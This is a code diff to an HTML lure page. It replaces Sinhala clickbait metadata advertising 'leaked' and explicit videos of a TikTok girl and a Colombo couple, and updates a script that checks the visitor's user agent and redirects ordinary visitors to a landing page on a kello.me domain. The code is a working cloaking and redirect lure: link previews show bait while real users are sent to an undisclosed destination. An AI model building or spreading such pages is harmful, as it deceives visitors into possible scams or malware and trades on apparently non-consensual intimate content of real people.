--- a/index.html
+++ b/index.html
@@ -5,13 +5,13 @@
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Page Access Control</title>
     <!-- Open Graph Metadata -->
-    <meta property="og:title" content="TikTok එකේ නංගිගේ ෆුල් රයිඩින් එක 🥵🤩">
+    <meta property="og:title" content="කොළඹ හොට් කපල් ලීක් එක 😍🍑">
     <meta property="og:type" content="website">
-    <meta property="og:url" content="https://jil.kello.me/">
-    <meta property="og:image" content="https://jil.kello.me/ogimages/image_1743146587_67e64e5b03f90.png">
+    <meta property="og:url" content="http://kello.me/">
+    <meta property="og:image" content="https://jil.kello.me/ogimages/image_1743147693_67e652ada193b.png">
     <meta property="og:image:width" content="500">
     <meta property="og:image:height" content="500">
-    <meta property="og:description" content="TikTok එකේ නංගිගේ ෆුල් රයිඩින් එක 🥵🤩">
+    <meta property="og:description" content="කොළඹ හොට් කපල් ලීක් එක 😍🍑">
     <script>
         window.onload = function() {
             // Check the user agent
@@ -24,10 +24,10 @@
             }
             // Otherwise, redirect to a random page
             const pages = [
-                "https://jilhub.kello.me/landing.php",
-                "https://jilhub.kello.me/landing.php",
-                "https://jilhub.kello.me/landing.php",
-                "https://jilhub.kello.me/landing.php"
+                "http://kello.me/landing.php",
+                "http://kello.me/landing.php",
+                "http://kello.me/landing.php",
+                "http://kello.me/landing.php"
             ];
             const randomPage = pages[Math.floor(Math.random() * pages.length)];
             window.location.href = randomPage;
